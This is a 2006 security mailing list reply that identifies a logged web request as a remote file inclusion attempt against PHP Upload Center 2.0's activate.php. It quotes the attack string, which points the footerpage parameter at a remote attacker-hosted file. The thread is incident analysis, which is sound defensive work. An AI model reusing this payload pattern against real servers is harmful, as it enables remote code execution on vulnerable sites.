Security Incidents mailing list archives

Re: http://thebesthack.altervista.org/input.txt

From: ascii <ascii () katamail com>
Date: Thu, 14 Dec 2006 03:03:35 +0100

modincidents () mail securityfocus com wrote:

PHP.asp</activate.php?language=conf&footerpage=http://thebesthack.altervista.org/input.txt?


altervista.org is an italian free web hosting

Does anyone know the specific vulnerability that this attack is
attempting to exploit?


it's a remote file inclusion vulnerability

PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities
http://www.google.com/search?q=activate.php%3Flanguage%3Dconf%26footerpage%3D

regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

------------------------------------------------------------------------------
This List Sponsored by: Black Hat

Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas. 
World renowned security experts reveal tomorrow's threats today. Free of 
vendor pitches, the Briefings are designed to be pragmatic regardless of your 
security environment. Featuring 36 hands-on training courses and 10 conference 
tracks, networking opportunities with over 2,500 delegates from 40+ nations. 

http://www.blackhat.com
------------------------------------------------------------------------------

Current thread:

http://thebesthack.altervista.org/input.txt modincidents (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt Bojan Zdrnja (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt ascii (Dec 14)
- Re: http://thebesthack.altervista.org/input.txt Adriano Carvalho (Dec 14)
- <Possible follow-ups>
- Re: http://thebesthack.altervista.org/input.txt santa (Dec 13)